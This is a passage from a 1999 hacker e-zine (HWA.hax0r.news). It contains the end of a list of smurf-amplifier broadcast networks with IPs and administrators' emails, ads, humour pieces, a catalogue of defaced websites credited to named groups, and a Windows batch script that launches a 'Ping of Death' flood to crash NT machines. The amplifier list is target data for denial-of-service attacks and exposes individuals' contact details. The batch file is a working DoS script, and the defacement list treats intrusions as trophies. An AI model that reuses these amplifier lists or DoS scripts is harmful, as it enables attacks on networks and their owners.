22 207.225.140.0 dns-info@uswest.net 22 208.154.170.0 ipadmin@cw.net 22 207.204.174.0 domainadmin@combase.com 22 209.122.182.0 domreg@erols.com 22 209.54.190.0 darin@good.net 22 209.214.200.0 ipadmin@bellsouth.net 22 207.204.208.0 domainadmin@combase.com 22 209.215.218.0 ipadmin@bellsouth.net 22 209.215.220.0 ipadmin@bellsouth.net 22 209.54.224.0 domainadmin@combase.com 22 209.215.18.255 ipadmin@bellsouth.net 22 209.215.20.255 ipadmin@bellsouth.net 22 216.78.21.255 ipadmin@bellsouth.net 22 216.78.23.255 ipadmin@bellsouth.net 22 216.78.25.255 ipadmin@bellsouth.net 22 210.159.113.255 hostmaster@nic.ad.jp 22 210.159.115.255 hostmaster@nic.ad.jp 22 210.159.118.255 hostmaster@nic.ad.jp 22 209.94.163.255 wells@wctc.net 22 207.204.174.255 domainadmin@combase.com 22 209.214.180.255 ipadmin@bellsouth.net 22 209.54.190.255 darin@good.net 22 210.225.196.255 hostmaster@nic.ad.jp 22 209.214.201.255 ipadmin@bellsouth.net 22 207.204.208.255 domainadmin@combase.com 22 209.54.224.255 domainadmin@combase.com 22 210.163.252.255 hostmaster@nic.ad.jp 22 209.131.12.0 nestigoy@mica.net 22 207.202.18.0 rosterman@rtquotes.com 22 207.109.152.0 dns-info@uswest.net 22 207.19.163.0 squires@mne.com 22 209.119.250.0 noc@digex.net 22 207.202.18.255 rosterman@rtquotes.com 22 207.19.163.255 squires@mne.com 22 209.79.176.255 diamond@quick.net 22 209.119.250.255 noc@digex.net 22 206.204.9.0 noc@conxion.net 22 210.67.64.0 JamesKLin@acer.net, JacksonWeng@acer.net 22 208.225.145.0 postmaster@dnap.com 22 209.208.185.0 hostmaster@pfmc.net 22 207.70.93.255 hostmaster@interaccess.com 22 209.218.26.0 maggie@redcreek.com 22 209.226.69.0 noc@in.bell.ca 22 207.19.161.0 squires@mne.com 22 207.222.168.0 mark_annati@jwgnet.com 22 210.67.64.255 JamesKLin@acer.net, JacksonWeng@acer.net 22 209.226.69.255 noc@in.bell.ca 22 206.81.145.255 dns-info@uswest.net 22 207.19.161.255 squires@mne.com 22 207.222.168.255 mark_annati@jwgnet.com 22 208.138.51.0 superdb@phonewave.net 22 208.168.238.0 rpost@remc8.k12.mi.us 22 208.138.51.255 superdb@phonewave.net 22 208.168.238.255 rpost@remc8.k12.mi.us 22 208.6.63.0 postmaster@watsonelec.com 22 207.77.72.0 george@laserlink.net 22 209.102.103.0 robertc@savvis.com 22 207.190.143.0 hostmaster@source.net 22 208.6.63.255 postmaster@watsonelec.com 22 207.190.143.255 hostmaster@source.net 22 209.14.108.0 sbeker@ta.telecom.com.ar 22 209.14.109.0 sbeker@ta.telecom.com.ar 22 209.14.108.255 sbeker@ta.telecom.com.ar 22 209.14.109.255 sbeker@ta.telecom.com.ar 22 209.69.159.255 dirvin@123.net 22 206.211.91.255 renae.h.key@gte.sprint.com 22 207.94.189.255 Louis_Lee@icgcomm.com 22 208.201.208.255 shai@interramp.com 22 207.223.57.0 maa@jwgnet.com 22 209.21.201.255 hostmaster@harvard.net 22 208.129.72.0 digital@uscybersites.net 22 209.38.22.255 dnsadmin@rmi.net 22 208.215.55.255 bo@quicklink.com 22 208.129.72.255 digital@uscybersites.net 22 206.211.86.255 renae.h.key@gte.sprint.com 22 209.133.189.0 colgate@oir.state.sc.us 22 209.133.189.255 colgate@oir.state.sc.us 22 206.201.241.255 scarr@huensd.k12.ca.us 22 209.107.45.255 hostmaster@co.verio.net 22 209.47.137.255 bmollon@saatchi.ca 22 209.14.135.255 dnr@spacelab.net 22 208.129.14.0 sundog@coop.crn.org 22 209.208.223.0 hostmaster@pfmc.net 22 209.166.16.0 hostmaster@ultracom.net 22 207.243.35.255 nomailbox@nowhere 22 206.247.91.0 rkd@rmi.net 22 206.247.91.255 rkd@rmi.net 22 209.227.25.255 eric@mxol.com 22 216.102.160.255 ip-admin@pbi.net 21 24.6.100.0 noc@noc.home.net 21 24.6.61.255 noc@noc.home.net 21 24.7.177.255 noc@noc.home.net 21 63.64.219.0 help@uunet.uu.net 21 63.64.219.255 help@uunet.uu.net 21 131.64.12.0 SSNYDER@cols.disa.mil 21 140.251.214.0 vinay@mail.med.cornell.edu 21 140.251.214.255 vinay@mail.med.cornell.edu 21 155.36.122.0 scott@ties.org 21 155.36.122.255 scott@ties.org 21 155.36.123.0 scott@ties.org 21 155.36.123.255 scott@ties.org 21 155.50.21.0 bgallant@keps.com 21 155.50.21.255 bgallant@keps.com 21 160.126.250.0 DEYODEB@detrick.disa.mil 21 160.126.250.255 DEYODEB@detrick.disa.mil 21 160.126.251.255 DEYODEB@detrick.disa.mil 21 161.132.57.255 operador@rcp.net.pe 21 168.234.39.255 mmorales@concyt.gob.gt 21 192.204.141.0 21 192.204.141.255 21 192.207.6.255 tom@server1.angus.com 21 193.100.188.0 herrnfeld@kirchhoff.de 21 193.100.188.255 herrnfeld@kirchhoff.de 21 193.122.10.0 21 193.140.196.0 ozturanm@boun.edu.tr, baysalc@boun.edu.tr 21 193.140.196.255 ozturanm@boun.edu.tr, baysalc@boun.edu.tr 21 193.15.208.0 21 193.194.142.0 kocovski@gagass.de, jan.kocovski@metronet.de 21 193.194.142.255 kocovski@gagass.de, jan.kocovski@metronet.de 21 193.194.143.0 kocovski@gagass.de, jan.kocovski@metronet.de 21 193.194.143.255 kocovski@gagass.de, jan.kocovski@metronet.de 21 193.194.88.0 benhamadi@ist.cerist.dz, elmaouhab@ist.cerist.dz, cerist2@cnuce.cnr.it 21 193.52.147.0 Gerard.Lietout@univ-rouen.fr 21 193.52.147.255 Gerard.Lietout@univ-rouen.fr 21 193.52.75.0 dupre@genome.vjf.inserm.fr 21 194.100.24.0 miki@clinet.fi, Kari.Rasanen@seiska.fi 21 194.137.92.0 ari.murtonen@ktt.fi, ari.h.murtonen@posti.fi 21 194.137.92.255 ari.murtonen@ktt.fi, ari.h.murtonen@posti.fi 21 194.158.231.0 daniel.waegli@sunrise.ch, daniel.dubuis@sunrise.ch 21 194.190.192.255 andr@trustworks.com 21 194.199.97.0 Paul.Sarlat@univ-ag.fr 21 194.199.97.255 Paul.Sarlat@univ-ag.fr 21 194.250.16.0 bourgeois@fermic.fr, niel@fermic.fr 21 194.254.147.255 marteau@astrsp-mrs.fr, bazzoli@cppm.in2p3.fr, aperio@luminy.univ-mrs.fr 21 194.255.12.0 paaske@internet.dk 21 194.255.12.255 paaske@internet.dk 21 194.57.10.0 techfem@mobilia.it 21 194.57.10.255 techfem@mobilia.it 21 194.64.121.0 schreiber@otterbach.de 21 195.182.176.0 21 195.182.177.255 Use of netscan.org indicates acceptance of this disclaimer. © 1998-1999 netscan.org Site version 0.98 sysop@netscan.org Changed 12/29/98 0606 PST @HWA !=----------=- -=----------=- -=----------=- -=----------=- -=----------=- O 0 o O O O 0 -=----------=- -=----------=- -=----------=- -=----------=- -=----------=- END of main news articles content... read on for ads, humour, hacked websites etc -=----------=- -=----------=- -=----------=- -=----------=- -=----------=- HWA.hax0r.news AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ***************************************************************************** * * * ATTRITION.ORG http://www.attrition.org * * ATTRITION.ORG Advisory Archive, Hacked Page Mirror * * ATTRITION.ORG DoS Database, Crypto Archive * * ATTRITION.ORG Sarcasm, Rudeness, and More. * * * ***************************************************************************** www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co m www.2600.com ########################################ww.2600.com www.freeke vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick. com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic k.com www.2600.########################################om www.2600.com www.fre ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre www.2600.com One of our sponsers, visit them now www.csoft.net * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV * * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ////////////////////////////////////////////////////////////////////////////// // To place an ad in this section simply type it up and email it to // // hwa@press,usmc.net, put AD! in the subject header please. - Ed // ////////////////////////////////////////////////////////////////////////////// @HWA HA.HA Humour and puzzles ...etc ~~~~~~~~~~~~~~~~~~~~~~~~~ Don't worry. worry a *lot* Send in submissions for this section please! ............. AntiOnline to Write Productive, Sense Making Article Contributed by siko Tuesday - July 20, 1999. 04:24PM UTC Early this afternoon, sources close to Innerpulse Media leaked information coming from the offices of AntiOnline. "He said he is going to write an article that doesn't piss all the fish in the pond off.", said the anonymous source. "I think he mentioned something about social engineering passwords." Speculation has grown throughout the day as to what could be posted on AntiOnline.com that actually makes sense and doesn't piss everyone off at the same time. "Not everything on there lacks content or doesn't make a point. I really enjoyed reading about the Granny Hacker from Heck. And that story about the new Super Computer coming out was really great the third time around on AntiOnline.com. I just wasn't in the mood two weeks ago." AntiOnline.com http://www.antionline.com/ @HWA http://www.minet.net/blagues/bofh/ The Bastard System Manager From Hell #1 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I get into my office and it's my first day - I want to make a good impression, so I empty my IN tray into the bin. Now that's what I call efficient! I get a call from the big boss - he's been getting complaints about the trainee bastard operator from hell. I ask him to forward all the complaints to me and that it would be best to let me deal with them. I ring the operator and get him to make an appointment with me. Two weeks later, he does, and I show him the complaints that have accumulated so far. "Seventy Three complaints in your first three weeks!" I shout "It's good - but it's NOT Good Enough! You should be getting at least 10 complaints a day - AT LEAST! Now, let's see what you're doing wrong: You get a call from a user - what do you do?" "Kill them off?" The TBOFH replies "NO! How can you kill them off if you don't know their USERNAME? Your FIRST priority is to get their username. Then what would you do?" "Kill them off?" "NO! Get them to tell you what their problem is!" "Why?" "Because later I can say they didn't explain their problem to you properly! It's a great defence - works every time. A user rings me up to complain; I listen to their problem, then say "OH, WHEN YOU SAID `MY PC DOESN'T WORK' HE MUST HAVE THOUGHT YOU MEANT `HOW CAN I MAKE MY PC NEVER WORK AGAIN AND DESTROY MY LIFE'S WORK AT THE SAME TIME?' - IT HAPPENS ALL THE TIME!' then they tell me how implausible that is, I say how terribly sorry we are, then fake some connect and CPU time records so their monthly bill is about the same as the Uraguayan national debt...Understand? So, after you've heard their problem, what do you do?" "Kill them off?" "NO! Then you make up some excuse. Have you got an excuse card calendar?" "Uh. No.." "And you said you were qualified to operate a computer! You'd better have mine." I pass my computer card calendar over, flipping it to page one - "ENTROPY"....... ...I like it. "Now, you give the cretin an excuse then what do you do?" "Kill them off?" "YES!" (He certainly has a fixation) "Then what?" "Hang up?" "NO! Then they'll call you back when the problem recurs. Your job is to make them FEAR calling you. How can you work when people are calling? So, you make them pay for calling in the first place. What would you do?" "Delete their files?" "Yeah, it's a start, but then they may call back when they get new files. You want them NEVER to call back. What could you do?" "Swear at them?" "No. I can see we'll have to demonstrate. Have you got a metal ballpoint?" "Yes" "See that wallsocket over there. Take the refill out of the pen and poke in into the wallsocket." "But it's live!" "Would I really make you do it if it were live?" "Oh" >fiddle< >fiddle< >BZZZZZZZEEEEERT!< >THUD!< of course I would. He was no good anyway. No killing instinct. @HWA SITE.1 Three sites this week #1 http://www.seifried.org/lasg/ Linux Administrators Security Guide Available in PDF format, a must read for all Sysadmins. Not much to say about this site, its not flashy, its totally utilitarian and is the place from which you should get the LASG in its updated form or redirect to mirror sites. rated: no rating - Ed Bored? #2 http://www.policescanner.com/ This site will let you listen via realaudio to scanner output from various areas around the States, very interesting stuff even (or especially) for you out of towners, good for those boring weekend nights when scanner traffic is especially busy. Appeals to those that never miss an episode of COPS or are radio enthusiasts... rated: 7/10 - eentity Are you missing Packetstorm Security and really want to download some juarez? #3 http://secureroot.m4d.com/hackattack/files/ try this site, they have a fairly decent archive of older philez, nice flashy site but not overly done, somewhat of a rootshell flavour.... rated: 7/10 - eentity @HWA H.W Hacked websites ~~~~~~~~~~~~~~~~ Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed * Hackers Against Racist Propaganda (See issue #7) Haven't heard from Catharsys in a while for those following their saga visit http://frey.rapidnet.com/~ptah/ for 'the story so far'... Latest cracked pages courtesy of attrition.org [99.08.01] [PulseWidth] Run Your Own Business (www.runyourownbusiness.com) [99.08.01] [PulseWidth] Nellis AFB (www.nellis.af.mil) [99.08.01] [ ] Nathan & Lewis Securities (www.nlfs.com) [99.08.01] [HFD] Jerry Springer Show (www.jerryspringer.com) [99.08.01] [AntiChrist] Expat News (www.expat-news.com) [99.08.01] [AntiChrist] London Soft (www.londonsoft.com) [99.08.01] [c0mrade] Maktoob (www.maktoob.com) [99.08.01] [AntiChrist] K One Inch (www.oneinch.com) [99.08.01] [AntiChrist] Sandhan (www.sandhan.com) [99.08.01] [AntiChrist] Savmart (www.savmart.com) [99.08.01] [AntiChrist] Two 40 (www.two40.com) [99.08.01] [AntiChrist] Klassic Net (www.klassic.net) [99.08.01] [AntiChrist] Adworkz Net (www.adworkz.net) [99.08.01] [AntiChrist] Interstate Mortgage (www.interstatemortgage.net) [99.08.01] [AntiChrist] McMahon Group (www.mcmahongroup.net) [99.08.01] [stonehenge crew] One Online (IT) (www.oneonline.it) [99.08.01] [gH] IDHL Gov (MY) (idhl.gov.my) [99.08.01] [gH] Imigration Department of Malaysia (MY) (imigresen.imi.gov.my) [99.08.01] [SOD] Instituto Geografico Agustin Codazzi (www.igac.gov.co) [99.08.01] [keebler elves] #3 KBS Gov (www.kbs.gov.my) [99.08.01] [FL3M] M Ecom Malls (www.ecommalls.com) [99.08.01] [ ] Software Tester (www.softwaretester.com) [99.08.01] [ReMiX] X-Forces (www.x-forces.com) [99.08.01] [ ] CK (cc) Minnesota (empire.lansing.cc.mi.us) [99.08.02] [SQ] KuKluxKlan (www.kkklan.com) [99.08.02] [red n black] NHM (UK) (www.nhm.ac.uk) [99.08.02] [LevelSeven] #2 Peronda Net (www.peronda.net) [99.08.02] [v00d00] K Bears In The Barn (www.bearsinthebarn.com) [99.08.02] [kastr0] Complete Chaos (www.completechaos.com) [99.08.02] [FOaM] Karbrella (www.karbrella.com) [99.08.02] [FL3M] K Career Concepts (www.careerconcepts.com) [99.08.02] [KHG] Yugoslavia 8m (yugoslavia.8m.com) [99.08.02] [AntiChrist] Plague 99 (www.plague99.org) [99.08.02] [AntiChrist] Pleasant Valley UU Church (www.pvuuc.org) [99.08.02] [AntiChrist] Chinese Club (www.chineseclub.org) [99.08.02] [AntiChrist] Faith Walker (www.faithwalker.net) [99.08.02] [AntiChrist] K Starcraft Bunker (www.starcraftbunker.net) [99.08.02] [AntiChrist] Buy Fab (www.buyfab.com) [99.08.02] [AntiChrist] CCP Inc. (www.ccp-inc.com) [99.08.02] [AntiChrist] Click2site (www.edwincolon.click2site.com) [99.08.02] [AntiChrist] Fil India (www.filindia.com) [99.08.02] [AntiChrist] General Technologies (www.generaltechnologies.com) [99.08.02] [AntiChrist] Gentleman Dog (www.gentlemandog.com) [99.08.02] [AntiChrist] India PR (www.indiapr.com) [99.08.02] [AntiChrist] Joke Pizza (www.jokepizza.com) [99.08.02] [AntiChrist] Keywest Shrimphouse (www.keywestshrimphouse.com) [99.08.02] [AntiChrist] Trivandrum Fair2000 (www.trivandrum-fair2000.com) [99.08.02] [AntiChrist] Work Comp Online (www.workcomponline.com) [99.08.02] [Offline] Cairo Net (www.caironet.com) [99.08.02] [bl0w team] Symantec (www.symantec.com) [99.08.02] [FL3M] Bennett Street (www.bennettstreet.com) [99.08.02] [FL3M] K Gamewood Net (www8.gamewood.net) Of note: AntiChrist calls it quit NYS returns (worthwhile reading) Several new defacers hit the scene [99.08.03] [PulseWidth] Amedd Army (akamai.tamc.amedd.army.mil) [99.08.03] [AntiChrist] Trivnet Club (www.trivnetclub.com) [99.08.03] [NYS] K Acte Enterprises (FR) (www.acte-entreprises.fr) [99.08.03] [ProdiByte] Rosario Bus (AR) (www.rosariobus.com.ar) [99.08.03] [Some Guy/Cat] Home Amateur (www.homeamateur.com) [99.08.03] [PulseWidth] K Model Aircraft (www.modelaircraft.org) [99.08.03] [PulseWidth] Health Library @ McGill (CA) (www.health.library.mcgill.ca) [99.08.03] [ProdiByte] Bonobus (AR) (www.bonobus.com.ar) [99.08.03] [KHG] Anti NATO (antinato.homepage.com) [99.08.03] [KHG] Anti NATO Links (antinatolinks.homepage.com) [99.08.03] [sciofide] K Cyber Match Hawaii (mail.cybermatchhawaii.com) [99.08.03] [KHG] Serbian Links (serbianlinks.homepage.com) [99.08.03] [Tranzer] Alerion (www.alerion.com) [99.08.03] [PulseWidth] K Buck (www.buck.com) [99.08.03] [Saeid Yomtobian] Lost Pussy (www.lostpussy.com) [99.08.03] [HiP] #2 Mall LA (www.mall-la.com) [99.08.03] [Tranzer] UPN 35 (www.upn35.com) [99.08.04] [PulseWidth] DOF CA Gov (www.dof.ca.gov) [99.08.04] [mozy] Pelican Org (AU)www.pelican.org.au) [99.08.04] [PulseWidth] Cumberland (www.cumberland.org) [99.08.04] [KHG] Serbia Online1 (serbiaonline1.cjb.net) [99.08.04] [Cobra] Stop Nato2 (stopnato2.cjb.net) [99.08.04] [Pakistan HC] (net88) CAIS (net88.cais.com) [99.08.04] [neeper] Home Web (www.home-web.com) [99.08.04] [keebler elves] Teens Land (www.teensland.com) [99.08.04] [mozy] WEVU TV (www.wevutv.com) [99.08.05] [ ] AntiOnline Security Site (www.antionline.com) [99.08.05] So [kl0wn krew] Abatelli (abatelli.com) [99.08.05] So [SQ] Energia GOB (MX) (atomo.energia.gob.mx) [99.08.05] So [ ] (code02) PBTech (code02.pbtech.net) [99.08.05] Li [holo] Tuo BME (HU) (minek.tuo.bme.hu) [99.08.05] Fb [doofoo] Nailed (nailed.com) [99.08.05] NT [CUM] Adl Net (www.adlnet.org) [99.08.05] NT [CUM] #2 Alloweb (www.alloweb.com) [99.08.05] NT [CUM] Become Net (www.become.net) [99.08.05] NT [mozy] Amazone (www.amazone.com) [99.08.05] NT [ ] Comsoft (www.comsoft.com) [99.08.05] Sc [tvc] Web Banners (www.webbanners.com) [99.08.06] So [LevelSeven] Poulan Weedeater (www.weedeater.com) [99.08.06] So [LevelSeven] Tytan Industries (www.tytan.com) [99.08.06] NT [mozy] Stadskanaal (www.stadskanaal.nu) [99.08.06] NT [v00d00] Meadowood Retirement Community (www.retiretoiu.com) [99.08.06] So [HiP] NorthStarNet (www.northstarnet.org) [99.08.06] So [LevelSeven] Santa's Official Page (www.north-pole.net) [99.08.06] So [LevelSeven] News Tips (www.newstips.com) [99.08.06] So [LevelSeven] Multiverse (www.multiverse.com) [99.08.06] NT [Citadel] Los Angeles City Site (www.la.com) [99.08.06] So [LevelSeven] 92.3 Cleveland's Jammin Oldies (www.jammin.com) [99.08.06] Ir [kl0wn krew] Illinois Institute of Technology (www.iit.edu) [99.08.06] NT [Xessor] Garth Brooks' Official site (www.garthbrooks.com) [99.08.06] So [LevelSeven] Best Supply (www.bestsupply.com) Hacked: http://www.prowrestling.com By: gH Mirror: http://www.attrition.org/mirror/attrition/com/www.prowrestling.com/ Hacked: http://www.idhl.gov.my (second time) By: Hi-Tech Hate Mirror: http://www.attrition.org/mirror/attrition/misc/www.idhl.gov.my-2 The following site appears to have been defaced. Mirror to come.... HACKED(?): http://www.antionline.com/eye By: Unknown Exploit Used: Appears to be a redirect or meta-tag redirect. This has not been confirmed although we have witnessed this for ourselves. Details to follow. AntiOnline Hacked? Thursday, August 5, 1999 at 13:43:28 by John Vranesevich - Founder of AntiOnline Following its policy about full site disclosure, AntiOnline offers the following statement: AntiOnline's newest feature, "Eye On The Underground", gathers data from several well known underground websites. The data is gathered dynamically once an hour via "AntiEye", one of our custom info-gathering applications. Today, one of the sites that we gather data from, Bikkel.com's message board, changed the format of their content to feed our website information other than that which was intended to be viewed from their actual webboard. Although this change in format in no way compromised the integrity of our servers, or the data contained therein, it did cause alternate information to be displayed on the "Eye On The Underground" section of our website to users who had specific versions of the Netscape and IE webbrowsers. We apologize to our users for the temporary disruption of this service. AntiOnline receives a hack attempt an average of once every 2 minutes, no one has ever successfully infiltrated any of our systems, or the data contained on them. and more sites at the attrition cracked web sites mirror: http://www.attrition.org/mirror/attrition/index.html ------------------------------------------------------------------------- A.0 APPENDICES _________________________________________________________________________ A.1 PHACVW, sekurity, security, cyberwar links ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc. The hack FAQ (The #hack/alt.2600 faq) http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html Hacker's Jargon File (The quote file) http://www.lysator.liu.se/hackdict/split2/main_index.html New Hacker's Jargon File. http://www.tuxedo.org/~esr/jargon/ HWA.hax0r.news Mirror Sites: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.ducktank.net/hwa/issues.html. ** NEW ** http://www.alldas.de/hwaidx1.htm ** NEW ** http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa. http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://archives.projectgamma.com/zines/hwa/. http://www.403-security.org/Htmls/hwa.hax0r.news.htm International links:(TBC) ~~~~~~~~~~~~~~~~~~~~~~~~~ Foreign correspondants and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed Belgium.......: http://bewoner.dma.be/cum/ Brasil........: http://www.psynet.net/ka0z http://www.elementais.cjb.net Canada .......: http://www.hackcanada.com Columbia......: http://www.cascabel.8m.com http://www.intrusos.cjb.net Indonesia.....: http://www.k-elektronik.org/index2.html http://members.xoom.com/neblonica/ http://hackerlink.or.id/ Netherlands...: http://security.pine.nl/ Russia........: http://www.tsu.ru/~eugene/ Singapore.....: http://www.icepoint.com Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine. Got a link for this section? email it to hwa@press.usmc.net and i'll review it and post it here if it merits it. @HWA ** FREE TOY INSIDE! *** This is an old and (should be) dead issue with Windows 95 boxen. The Ping Of Death (PoD) was quite rampant, and created havoc on irc and elsewhere in its day, you can test your box for PoD vulnerability by using the following batchfile. Note that results do not always occur immediately, but sometimes occur several minutes after the 'attack'.... included for the hell of it, I was bored, the file was just there so wtf? you know? kinda like trying an old exploit you KNOW is gonna be patched but wanna try it anyway? sometimes with newer versions of software old bugs are reintroduced so don't throw away all your old DoS programs or exploits, check your systems regularily.... - DrunkPhuX --cut-- @echo off cls echo ------------------------------------------------------------------------------ echo IMPORTANT INFO: echo. echo This Ping of Death works best if you try to surf the Internet echo at the same time. Now I will try to start the web browser for echo you right now. If it does not start, please start one right now. echo. echo More info at http://www.sophist.demon.co.uk/ping/ echo Author of this batch file can be reached at [ag115@freenet.carleton.ca] echo. echo This crashes the author's NT 4.0 Service Pack 1 system reliably echo and one other system. A third system didn't work, though. echo THIS SCRIPT PROBABLY DOES NOT CRASH SYSTEMS OTHER THAN THE ONE THIS RUNS ON! echo. echo Please flush your disk cache first to be on the safe side. echo This is done by hitting Ctrl-Alt-Delete once then hiting Esc to return. echo ------------------------------------------------------------------------------ echo. echo Attempting to launch Web Browser, please wait... start /high http://www.microsoft.com/ echo When a web browser is up, press any key to start Ping of Death on localhost. pause cls echo ------------------------------------------------------------------------------ echo Now Initiating Ping of Death flood to localhost! echo ------------------------------------------------------------------------------ echo. echo This may take a few minutes, especially if you only have 16 or 32 MB. echo Please wait until the prompt returns before you try to surf. echo Forking Ping of Death processes... REM Seems to work best with taskman loaded, for some weird reason. start /high /min taskmgr.exe for %%d in ( A B C D E F G H I J K L M N O P Q R ) do start /min ping -l 65527 -n 1000 localhost cls echo ------------------------------------------------------------------------------ echo READY TO CRASH WITHIN THE HOUR! echo. echo Ping of Death in now in progress...Surf and Die - pun intended. ;-) echo You should see the blue screen with a STOP error soon. echo. echo You may surf now. Remember, it may take 10 mins to crash. Or less. Or more. echo And not all NT 4.0 systems will crash with this script. echo You could try launching TaskMgr and a few small apps to expedite the crash. echo ------------------------------------------------------------------------------ --cut-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- © 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t } -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]